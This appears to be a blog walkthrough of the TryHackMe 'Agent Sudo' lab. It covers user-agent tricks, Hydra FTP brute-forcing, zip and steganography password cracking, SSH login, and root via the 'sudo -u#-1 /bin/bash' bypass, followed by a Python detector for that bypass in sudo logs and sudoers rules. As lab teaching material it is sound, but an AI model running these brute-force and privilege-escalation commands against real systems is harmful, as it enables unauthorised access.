Agent Sudo
Hi Techies,
In this article, we will discuss the Agent Sudo TryHackMe machine. It involves some manual enumeration, FTP brute-forcing with Hydra, SSH access, and then privilege escalation through a sudo CVE vulnerability.
Deploy the vulnerable machine
Connect to the VPN and check the connectivity
Let’s start with the task
Task 1 :- Author Note
Deploy the machine
Task 2 :- Enumerate
We will check for the open ports using nmap
#nmap -sS -sV -O 10.10.237.205
1. How many open ports?
3 open ports
2. How you redirect yourself to a secret page?
Since port 80 is open, we will check the web server.
Here, we get a hint that the user-agent is the way to the secret page
3. What is the agent name?
There is a hint for this question: try the user-agent “C”
We will change the user-agent with the help of Burp
Intercept the request to the web server with Burp
Here, we can see the hostname
We will change the user-agent to “C” and forward
Once we forward the intercepted request, we can see the URL change. Forward it again
Check the page on the web server: the Agent C user is “chris”
Task 3
Done enumerate the machine? Time to brute your way out.
1. FTP password
Since we have the username, we will try to brute-force it with Hydra to get the password
#hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.237.205 -t4
Now we have the credentials for FTP. We will log in using them.
#ftp 10.10.237.205
Username :- chris
Password :- crystal
Here, we find three files. We will download them to our Kali machine using the “get” command
We will view the content of one of the downloaded files
#cat To_agentJ.txt
2. Zip file password
We will extract the contents embedded in the PNG file using “binwalk”
#binwalk -e cutie.png
There are some zip files; we will look for the content of the zip file.
Check the extracted directory.
Inside the extracted directory, we can see the zip file.
We will convert the .zip file to a text file using John (provided as a hint)
#zip2john 8702.zip >zip
We will check for the content of the converted text file
#cat zip
Since the text file contains a hash, we will crack it using John the Ripper
#john zip
We found that the zip file password is alien
3. steg password
We have another file, a JPG.
In order to extract the content of the JPG file, we will use the steghide command
Steghide asks for a passphrase, so we will crack the password using stegcracker
#stegcracker cute-alien.jpg
We got the passphrase as Area51
Now that we have the password, we will extract the data from the JPG file
#steghide extract -sf cute-alien.jpg
Steghide extracted the data from the JPG file and stored it in the “message.txt” file
We will view the extracted file
#cat message.txt
We found the user “James” and the password “hackerrules!”
4. Who is the other agent (in full name)?
By viewing the content of the message.txt file, we learn that the username is “James”
5. SSH password
The password is “hackerrules!”
Task 4 :- Capture the user flag
You know the drill.
1. What is the user flag?
We know the username and password for SSH. We will log in with them to find the user flag
#ssh james@10.10.237.205
We have a user shell; now we will find the user flag.
#cat user_flag.txt
2. What is the incident of the photo called?
We found another JPG image for the james user
I tried with stegcracker, but it throws an error.
So I searched the internet for the result.
Task 5 :- Privilege Escalation
Check the sudo permissions for the user
#sudo -l
1. CVE number for the escalation (Format: CVE-xxxx-xxxx)
Search on the internet to find the result
To escalate privileges, we use the exploit
#sudo -u#-1 /bin/bash
2.What is the root flag?
After escalating, we have root access
#cat root.txt
3. (Bonus) Who is Agent R?
Deskel
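A defensive companion to the “sudo -u#-1” step in Task 5, added here as an example (not part of the original write-up): it scans sudo log lines for commands run as user ID -1 or 4294967295, which affected sudo builds treat as root, and flags sudoers rules whose Runas list is “(ALL, !root)”. The log lines, the sudoers fragment, the host name “host1” and the function names are constructed for illustration, and the “USER=#-1” layout is assumed from sudo's usual syslog format.

```python
import re

# Runas IDs that affected sudo builds resolve to UID 0: -1 and its unsigned 32-bit form.
SUSPECT_IDS = {"-1", "4294967295"}
# Assumed sudo syslog layout: "<user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_LINE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?USER=(?P<runas>[^ ;]+) ; COMMAND=(?P<cmd>.*)$"
)
# sudoers Runas list that allows every user except root, e.g. (ALL, !root)
RISKY_RUNAS = re.compile(r"\(\s*ALL\s*,\s*!\s*root\b")

# Constructed sample data, not taken from the target machine.
SAMPLE_LOG = """\
Oct 29 10:01:12 host1 sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/id
Oct 29 10:03:40 host1 sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=#-1 ; COMMAND=/bin/bash
Oct 29 10:05:02 host1 sudo:    chris : TTY=pts/1 ; PWD=/home/chris ; USER=#4294967295 ; COMMAND=/bin/bash
Oct 29 10:06:30 host1 sshd[812]: Accepted password for james from 10.0.0.5 port 51122 ssh2
"""
SAMPLE_SUDOERS = """\
# constructed sudoers fragment
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL, !root) /bin/bash
"""

def find_runas_id_abuse(log_lines):
    """Return (user, runas, command) for sudo entries run as a suspect numeric ID."""
    hits = []
    for line in log_lines:
        m = SUDO_LINE.search(line)
        if m and m.group("runas").lstrip("#") in SUSPECT_IDS:
            hits.append((m.group("user"), m.group("runas"), m.group("cmd").strip()))
    return hits

def find_risky_rules(sudoers_text):
    """Return (line number, rule) for rules whose Runas list is ALL minus root."""
    risky = []
    for number, line in enumerate(sudoers_text.splitlines(), 1):
        rule = line.strip()
        if rule and not rule.startswith("#") and RISKY_RUNAS.search(rule):
            risky.append((number, rule))
    return risky

if __name__ == "__main__":
    for hit in find_runas_id_abuse(SAMPLE_LOG.splitlines()):
        print("suspicious sudo run:", hit)
    for number, rule in find_risky_rules(SAMPLE_SUDOERS):
        print(f"review sudoers line {number}: {rule}")
```

Updating sudo to a fixed build removes the issue; the sudoers check shows which rules were exposed in the meantime.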
Hope you enjoy reading this. Thank you